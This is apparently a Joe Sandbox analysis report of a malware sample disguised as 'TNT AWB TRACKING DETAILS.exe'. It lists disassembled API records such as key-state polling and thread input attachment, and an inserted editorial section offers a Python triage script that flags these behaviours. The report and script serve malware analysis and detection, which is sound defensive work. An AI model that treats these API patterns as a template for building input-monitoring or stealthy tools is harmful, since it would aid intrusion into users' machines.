                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044480E
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                      • GetKeyState.USER32(000000A0), ref: 004448AA
                                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                      • GetKeyState.USER32(000000A1), ref: 004448D9
                                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                      • GetKeyState.USER32(00000011), ref: 00444903
                                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                      • GetKeyState.USER32(00000012), ref: 0044492D
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                      • GetKeyState.USER32(0000005B), ref: 00444958
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: InitVariant$_malloc_wcscpy_wcslen
                                      • String ID:
                                      • API String ID: 3413494760-0
                                      • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                      • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                      • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                      • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                      • String ID: AU3_FreeVar
                                      • API String ID: 2634073740-771828931
                                      • Opcode ID: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                      • Opcode Fuzzy Hash: da08cc041a21d481ca46116ab47081ac4fbb3e56b80667e79e82d75b6ee56f55
                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
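The function records above are worth reading as a group rather than one at a time: the `\IPC$` / `RegConnectRegistryW` record, the `GetAsyncKeyState` / `GetKeyState` record and the `AU3_FreeVar`, `@GUI_DRAGFILE` and `^ ERROR` strings are all recognisable pieces of the AutoIt3 interpreter runtime that the sample is compiled with, so they describe what the runtime can do, not what this script does. The key-state record polls only modifier keys (0xA0/0xA1 are VK_LSHIFT/VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN); a keystroke logger would poll the whole key range. The following Python script is an added example, not part of the Joe Sandbox report: it parses records written in the report's own `• API.MODULE(args), ref: address` line format, splits the `String ID` field, and applies three triage rules. The embedded excerpt is a constructed copy of three records from this page; the virtual-key name table and the list of AutoIt marker strings are the editor's own, and the rule labels are assumptions about intent that an analyst still has to confirm in the disassembly.

```python
"""Parse Joe Sandbox function records and flag API/string combinations.

Added example, not part of the Joe Sandbox report.  SAMPLE is a
constructed copy of three records from this page, in the report's own
line format.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
• WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
• RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
• CLSIDFromString.OLE32(?,?), ref: 004587B3
Similarity
• API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
• String ID: SOFTWARE\\Classes\\$\\CLSID$\\IPC$
APIs
• GetKeyboardState.USER32(?), ref: 0044480E
• GetAsyncKeyState.USER32(000000A0), ref: 00444899
• GetKeyState.USER32(000000A0), ref: 004448AA
• GetAsyncKeyState.USER32(00000011), ref: 004448F5
• GetAsyncKeyState.USER32(0000005B), ref: 00444949
Similarity
• API ID: State$Async$Keyboard
• String ID:
APIs
Similarity
• API ID: AddressProc_free_malloc$_strcat_strlen
• String ID: AU3_FreeVar
"""

# One API line: optional "Part of subcall function <addr>:", then
# Name.MODULE, optional (args), then "ref: <addr>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})\s*$"
)
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Editor's table of modifier virtual-key codes (assumption: any code
# outside this table is treated as a non-modifier key).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT",
            0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
            0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}
# Strings seen in this report that belong to the AutoIt3 runtime (editor's list).
AUTOIT_MARKERS = {"AU3_FreeVar", "@GUI_DRAGFILE", "@GUI_DROPID", "^ ERROR"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address when reported as "Part of subcall function"


@dataclass
class Record:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def direct_apis(self):
        """APIs the function calls itself, excluding those attributed to subcalls."""
        return {c.api for c in self.calls if c.subcall is None}


def parse_records(text):
    """Split report text into Record objects, one per 'APIs' heading."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = STRING_LINE.match(line)
        if m:
            # Joe Sandbox joins strings with '$', so a literal '$' (the IPC$
            # share name) is indistinguishable from the separator: '\IPC$'
            # comes out as '\IPC' and is matched by prefix in triage().
            cur.strings.extend(s for s in m["ids"].split("$") if s)
    return records


def polled_keys(rec):
    """Virtual-key codes passed as the first argument to key-state APIs."""
    return {int(c.args[0], 16) for c in rec.calls
            if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] != "?"}


def triage(records):
    """Return (record index, finding) pairs for the three rules described above."""
    findings = []
    for i, rec in enumerate(records):
        keys = polled_keys(rec)
        if keys:
            names = sorted(VK_NAMES.get(k, "0x%02X" % k) for k in keys)
            scope = "modifier keys only" if keys <= set(VK_NAMES) else "includes non-modifier keys"
            findings.append((i, "key-state polling (%s): %s" % (scope, ", ".join(names))))
        if "RegConnectRegistryW" in rec.direct_apis() and any(s.startswith("\\IPC") for s in rec.strings):
            findings.append((i, "remote registry read after IPC$ connection"))
        hits = AUTOIT_MARKERS & set(rec.strings)
        if hits:
            findings.append((i, "AutoIt3 runtime string: " + ", ".join(sorted(hits))))
    return findings


if __name__ == "__main__":
    for idx, finding in triage(parse_records(SAMPLE)):
        print(idx, finding)
```

Run against a whole report export, the same parser lets you answer "which functions both connect to a share and touch the registry" in one pass instead of scrolling; the prefix match on `\IPC` is deliberate because the report's `$` separator swallows the share name's trailing character.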
                                      APIs
                                      • CoInitialize.OLE32 ref: 0046C63A
                                      • CoUninitialize.OLE32 ref: 0046C645
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 2294789929-1287834457
                                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                      APIs
                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                      • ReleaseCapture.USER32 ref: 0047116F
                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 2483343779-2107944366
                                      • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                      • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                      • _wcslen.LIBCMT ref: 00450720
                                      • _wcscat.LIBCMT ref: 00450733
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat_wcslen
                                      • String ID: -----$SysListView32
                                      • API String ID: 4008455318-3975388722
                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                      • GetParent.USER32 ref: 00469C98
                                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                      • GetParent.USER32 ref: 00469CBC
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 2360848162-1403004172
                                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                      • String ID:
                                      • API String ID: 262282135-0
                                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                      APIs
                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                      • SendMessageW.USER32(753E23D0,00001001,00000000,?), ref: 00448E16
                                      • SendMessageW.USER32(753E23D0,00001026,00000000,?), ref: 00448E25
                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                      • String ID:
                                      • API String ID: 3771399671-0
                                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 0-1603158881
                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                      APIs
                                      • CreateMenu.USER32 ref: 00448603
                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                      • IsMenu.USER32(?), ref: 004486AB
                                      • CreatePopupMenu.USER32 ref: 004486B5
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                      • DrawMenuBar.USER32 ref: 004486F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0
                                      • API String ID: 161812096-4108050209
                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe), ref: 00434057
                                      • LoadStringW.USER32(00000000), ref: 00434060
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                      • LoadStringW.USER32(00000000), ref: 00434078
                                      • _wprintf.LIBCMT ref: 004340A1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                      Strings
                                      • C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, xrefs: 00434040
                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                      • API String ID: 3648134473-1828596950
                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
